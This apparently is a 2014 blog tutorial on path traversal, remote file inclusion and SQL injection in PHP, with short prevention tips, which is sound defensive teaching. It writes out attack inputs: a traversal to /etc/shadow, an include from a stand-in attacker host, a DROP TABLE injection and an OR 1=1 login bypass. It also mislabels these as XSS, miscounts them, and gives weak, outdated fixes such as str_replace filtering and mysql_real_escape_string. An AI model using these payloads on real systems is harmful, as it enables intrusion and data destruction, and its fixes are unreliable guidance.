HomeNoneAdvanced XSS methods and how to prevent – part 2
Advanced XSS methods and how to prevent – part 2
August 19, 2014
At part 1, i’ve introduced about 2 methods of XSS, they’re Parameter Tampering, Cross-Site Request Forgery (CSRF).
In this part, i will show you 2 more mthods of XSS: Path Traversal, Remote File Inclusion, SQL Injection
1. Path Traversal
Assume there’s a script to print the contents of a file to the browser
Located at /var/www/scripts/showfile.php
Encrypted password file located at:
Attacker can print the contents of the password file:
– showfile.php?file=../../../etc/shadow – This assumes that Apache has permission to read shadow in the first place.
This can be prevented by setting the correct permissions for your files
– /etc/shadow can only be read by root, not Apache
Server configuration settings also allow you to prevent files from being accessed over the Web – .htaccess: in the directory to be protected – httpd.conf: Apache configuration settings
Could use str_replace to remove “/” and “\”
2. Remote File Inclusion
Consider include.php?file=foo – include($_GET[‘file’] . “.php”); – Includes foo.php inside the document include.php?file=http://badguy.com/42.php? – include(“http://badguy.com/42.php?.php”); – We need the “?” so the filename doesn’t become “42.php.php” Solution: Don’t pass anything directly into include(), exec(), system(), etc, ever.
3. SQL Injection
Consider the following in insecure.php:
– $id = $_GET[‘id’]; – $q = “SELECT * FROM table WHERE id=’$id’ “; – $result = mysql_query($q);
$id isn’t escaped, so we can set $id to a value that starts a new query
– End the old query early, and start a new query – Comment out the rest of the old query Example: Dropping a table
insecure.php?id=‘; DROP TABLE users;– – “SELECT * FROM table WHERE id=’DROP TABLE users;– – ”; Ends the original query. We can start a new one – DROP TABLE users; Execute a new query. – –‘;Comment out the leftover from the original.
Example: Bypassing a login:
In the password field: ‘OR 1=1;–‘
“SELECT * FROM users WHERE uname=’$user’ AND pass=’$pass’;
- "SELECT * FROM users WHERE uname='$user' AND pass='' OR 1=1;--'
=> While the (uname AND pass) conditions will fail, 1=1 will always succeed! We’ve already discussed a solution: escape all of the special characters in strings before using them
Solution: Use mysql_real_escape_string($str) for this!